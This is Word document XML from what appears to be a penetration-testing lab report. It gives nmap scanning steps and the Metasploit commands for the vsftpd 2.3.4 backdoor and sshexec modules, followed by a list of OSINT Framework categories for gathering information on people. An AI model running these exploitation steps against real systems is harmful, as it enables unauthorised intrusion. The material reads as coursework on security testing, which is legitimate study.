          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="717D63A0" wp14:editId="7263EBC8">
            <wp:extent cx="5512279" cy="250995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8606" cy="2517391"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D348F6" w:rsidRPr="004750F9" w:rsidRDefault="00D348F6" w:rsidP="00D348F6">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
          <w:b w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004750F9">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
          <w:b w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Scan Ip address using nmap</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D348F6" w:rsidRPr="004750F9" w:rsidRDefault="00D348F6" w:rsidP="00D348F6">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004750F9">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="004750F9">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Check the vulnerable version exploitation's procedure in rapid7 and start exploiting the following ports</w:t>
      </w:r>
      <w:r w:rsidRPr="004750F9">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="004750F9">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>A)</w:t>
      </w:r>
      <w:r w:rsidR="00943135">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="004750F9">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Telnet</w:t>
      </w:r>
      <w:r w:rsidRPr="004750F9">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="004750F9">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>B)</w:t>
      </w:r>
      <w:r w:rsidR="00943135">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="004750F9">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>FTP</w:t>
      </w:r>
      <w:r w:rsidRPr="004750F9">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="004750F9">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>C)</w:t>
      </w:r>
      <w:r w:rsidR="00943135">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="004750F9">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>SSH</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D348F6" w:rsidRPr="004750F9" w:rsidRDefault="00D348F6" w:rsidP="00D348F6">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004750F9">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Step 1</w:t>
      </w:r>
      <w:r w:rsidR="00943135" w:rsidRPr="004750F9">
        <w:rPr>
          <w:noProof/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0221C8CA" wp14:editId="65209D43">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974"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r w:rsidRPr="004750F9">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D348F6" w:rsidRPr="004750F9" w:rsidRDefault="00D348F6" w:rsidP="00D348F6">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004750F9">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Step 2 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D348F6" w:rsidRPr="004750F9" w:rsidRDefault="00D348F6" w:rsidP="00D348F6">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004750F9">
        <w:rPr>
          <w:noProof/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7920AD12" wp14:editId="759C78E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785C5C" w:rsidRPr="004750F9" w:rsidRDefault="00785C5C" w:rsidP="00D348F6">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="22"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00785C5C" w:rsidRPr="004750F9" w:rsidRDefault="00785C5C"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E62C19" w:rsidRPr="004750F9" w:rsidRDefault="00E62C19" w:rsidP="00D348F6">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="22"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00D348F6" w:rsidRPr="004750F9" w:rsidRDefault="00D348F6" w:rsidP="00D348F6">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="22"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004750F9">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="22"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Step 3 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00785C5C" w:rsidRPr="004750F9" w:rsidRDefault="00D348F6" w:rsidP="00E62C19">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004750F9">
        <w:rPr>
          <w:noProof/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0ED84A29" wp14:editId="1AA1B893">
            <wp:extent cx="5943179" cy="5135526"/>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2590" cy="5143658"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E62C19" w:rsidRPr="004750F9" w:rsidRDefault="00E62C19" w:rsidP="00E62C19">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00E62C19" w:rsidRPr="004750F9" w:rsidRDefault="00E62C19" w:rsidP="00E62C19">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00D348F6" w:rsidRPr="004750F9" w:rsidRDefault="00D348F6" w:rsidP="00785C5C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004750F9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve">To exploit the ftp type following </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D348F6" w:rsidRPr="004750F9" w:rsidRDefault="00D348F6" w:rsidP="00D348F6">
      <w:pPr>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&gt; use exploit/unix/ftp/vsftpd_234_backdoor</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exploit(vsftpd_234_backdoor) &gt; show targets</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 xml:space="preserve">    ...targets...</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exploit(vsftpd_234_backdoor) &gt; set TARGET &lt; target-id &gt;</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exploit(vsftpd_234_backdoor) &gt; show options</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 xml:space="preserve">    ...show and set options...</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D348F6" w:rsidRPr="004750F9" w:rsidRDefault="00D348F6" w:rsidP="00D348F6">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FEFEFE"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004750F9">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FEFEFE"/>
        </w:rPr>
        <w:t>msf exploit(vsftpd_234_backdoor) &gt; exploit</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E62C19" w:rsidRPr="004750F9" w:rsidRDefault="00E62C19" w:rsidP="00E62C19">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FEFEFE"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00D348F6" w:rsidRPr="004750F9" w:rsidRDefault="00D348F6" w:rsidP="00785C5C">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FEFEFE"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004750F9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FEFEFE"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>And for SSH OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)</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&gt; use exploit/multi/ssh/sshexec</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exploit(sshexec) &gt; show targets</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 xml:space="preserve">    ...targets...</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exploit(sshexec) &gt; set TARGET &lt; target-id &gt;</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msf exploit(sshexec) &gt; show options</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D348F6" w:rsidRPr="004750F9" w:rsidRDefault="00D348F6" w:rsidP="00D348F6">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FEFEFE"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004750F9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FEFEFE"/>
        </w:rPr>
        <w:t xml:space="preserve">    ...show and set options...</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D348F6" w:rsidRPr="004750F9" w:rsidRDefault="00D348F6" w:rsidP="00D348F6">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FEFEFE"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004750F9">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FEFEFE"/>
        </w:rPr>
        <w:t>msf exploit(sshexec) &gt; exploit</w:t>
      </w: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FC301B" w:rsidRPr="004750F9" w:rsidRDefault="00FC301B" w:rsidP="00D348F6">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FEFEFE"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00E62C19" w:rsidRPr="004750F9" w:rsidRDefault="00E62C19" w:rsidP="00D348F6">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FEFEFE"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00E62C19" w:rsidRPr="004750F9" w:rsidRDefault="00E62C19" w:rsidP="00D348F6">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FEFEFE"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00E62C19" w:rsidRPr="004750F9" w:rsidRDefault="00E62C19" w:rsidP="00D348F6">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FEFEFE"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00E62C19" w:rsidRPr="004750F9" w:rsidRDefault="00E62C19" w:rsidP="00D348F6">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FEFEFE"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00E62C19" w:rsidRPr="004750F9" w:rsidRDefault="00E62C19" w:rsidP="00D348F6">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FEFEFE"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00E62C19" w:rsidRPr="004750F9" w:rsidRDefault="00E62C19" w:rsidP="00FC301B">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FEFEFE"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00FC301B" w:rsidRPr="004750F9" w:rsidRDefault="00FC301B" w:rsidP="00FC301B">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004750F9">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="32"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Information Gathering and Exploitation  </w:t>
      </w:r>
      <w:r w:rsidRPr="004750F9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:br/>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FC301B" w:rsidRPr="004750F9" w:rsidRDefault="00FC301B" w:rsidP="00FC301B">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:rPr>
          <w:b/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004750F9">
        <w:rPr>
          <w:b/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>For Information gathering use osnitframework.com website.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E62C19" w:rsidRPr="004750F9" w:rsidRDefault="00E62C19" w:rsidP="00FC301B">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:rPr>
          <w:b/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00FC301B" w:rsidRPr="004750F9" w:rsidRDefault="00FC301B" w:rsidP="00FC301B">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004750F9">
        <w:rPr>
          <w:noProof/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6916E532" wp14:editId="48D33C8E">
            <wp:extent cx="6092190" cy="636890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4733" cy="6382015"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FC301B" w:rsidRPr="004750F9" w:rsidRDefault="00FC301B" w:rsidP="00FC301B">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00FC301B" w:rsidRPr="004750F9" w:rsidRDefault="00FC301B" w:rsidP="00FC301B">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00943135" w:rsidRDefault="00943135" w:rsidP="00FC301B">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00FC301B" w:rsidRPr="004750F9" w:rsidRDefault="00FC301B" w:rsidP="00FC301B">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004750F9">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>GATHER INFORMATION:</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Dating</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People Search Engines</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Instant Messaging</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Social NetworksImages / Videos / Docs</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IP Address</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Domain</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Name</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FC301B" w:rsidRPr="004750F9" w:rsidRDefault="00FC301B" w:rsidP="00A266D6">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004750F9">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Email Address</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A266D6"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TrainingDocumentationOpSec</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Threat Intelligence</w:t>
      </w:r>
      <w:r w:rsidR="00A266D6" w:rsidRPr="004750F9">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Exploits </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 xml:space="preserve">AnalysisToolsEncoding  </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DecodingClassifieds</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Digital Currency</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 xml:space="preserve">Dark WebTerrorismMobile </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 xml:space="preserve">EmulationMetadataLanguage </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 xml:space="preserve">TranslationArchivesForums </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IRCSearch Engines</w:t>
      </w:r>
      <w:r w:rsidR="00A266D6" w:rsidRPr="004750F9">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Geolocation Tools </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FC301B" w:rsidRPr="004750F9" w:rsidRDefault="00FC301B" w:rsidP="00A266D6">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
